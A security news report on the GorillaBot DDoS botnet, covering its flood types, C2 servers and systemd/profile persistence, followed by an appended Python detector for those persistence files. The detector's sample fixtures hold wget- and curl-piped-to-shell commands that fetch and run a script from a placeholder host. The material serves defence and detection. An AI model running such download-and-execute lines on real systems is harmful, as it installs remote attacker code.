Stratos Ally

GorillaBotNet targets more than 100 countries with DDoS


DarkSoul


Security researchers have discovered a new botnet. It is believed to be a variant of the leaked Mirai botnet source code and has been named Gorilla Botnet, aka GorillaBot. The cybersecurity firm NSFOCUS observed approximately 300,000 attack commands issued by the botnet within the attack window of 4 to 27 September.

On average, the botnet issued about 20,000 DDoS commands per day over the 23-day period. Rather than focusing on any specific organization or country, this high-density DDoS activity was spread across 100 countries, targeting banks, universities, telecom vendors and other sectors. The countries attacked most during this window were the US, China, Canada and Germany.

To conduct these DDoS attacks, Gorilla Botnet uses UDP, ACK BYPASS, VSE (Valve Source Engine), SYN and ACK floods, exploiting in particular the connectionless nature of the UDP protocol. By combining these techniques with UDP’s lack of connection-based reliability, the botnet can spoof arbitrary source IP addresses and amplify the volume of traffic directed at the target. The botnet supports multiple CPU architectures, including ARM, MIPS, x86_64 and x86, and connects to one of five predefined command-and-control (C2) servers to await DDoS commands.

The botnet also attempts to exploit an Apache Hadoop YARN RPC vulnerability to achieve remote code execution, and it achieves persistence by creating a service file named “custom.service” in the “/etc/systemd/system/” directory and configuring it to run automatically at system startup. The service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar commands are also added to the “/etc/inittab”, “/etc/profile” and “/boot/bootcmd” files so that the shell script is downloaded and run at system startup or user login.

The botnet relies on multiple persistence techniques to remain on a host for a long time, which makes countermeasures harder to apply.
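A defender-side check for the persistence locations named above, added here as an example and not part of the original article or of NSFOCUS's analysis: it scans the named startup files and systemd units for any line that fetches a remote http(s) script and executes it. The sample file contents and the `c2.example.invalid` domain are constructed placeholders, and the `FETCH_EXEC` pattern is a heuristic assumption rather than a published signature.

```python
import re
from pathlib import Path

# Locations the article names as modified by GorillaBot to run lol.sh at boot or login.
PERSISTENCE_PATHS = ["/etc/inittab", "/etc/profile", "/boot/bootcmd"]
SYSTEMD_DIR = "/etc/systemd/system"

# Heuristic: wget/curl fetching an http(s) URL on the same line as something that executes it.
FETCH_EXEC = re.compile(
    r"\b(wget|curl)\b[^;|&\n]*https?://\S+"
    r".*?(\|\s*(ba|da)?sh\b|;\s*(ba|da)?sh\b|&&\s*(ba|da)?sh\b|chmod\s+[+0-7]*x)",
    re.IGNORECASE,
)

def audit_persistence(files):
    """files: mapping of path -> file text. Returns one finding per line that
    downloads a remote script and executes it, in file order."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            if FETCH_EXEC.search(line):
                findings.append({"path": path, "line": lineno, "text": line.strip()})
    return findings

def collect_from_disk():
    """Read the real startup files on a host (some need root); unreadable ones are skipped."""
    candidates = [Path(p) for p in PERSISTENCE_PATHS] + list(Path(SYSTEMD_DIR).glob("*.service"))
    files = {}
    for p in candidates:
        try:
            files[str(p)] = p.read_text(errors="replace")
        except OSError:
            pass
    return files

# Constructed sample content modelled on the article's description; the .invalid domain is a placeholder.
SAMPLE_FILES = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget http://c2.example.invalid/lol.sh -O /tmp/lol.sh; sh /tmp/lol.sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/profile": (
        "# see https://www.kernel.org/doc/ for docs\n"   # a URL without execution is not flagged
        "export PATH=$PATH:/usr/local/bin\n"
        "curl -s http://c2.example.invalid/lol.sh | sh\n"
    ),
    "/etc/inittab": "id:3:initdefault:\n",
}
```

Run `audit_persistence(collect_from_disk())` on a live host, or pass `SAMPLE_FILES` to see the two constructed hits (the systemd `ExecStart` line and the `curl | sh` line in `/etc/profile`).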
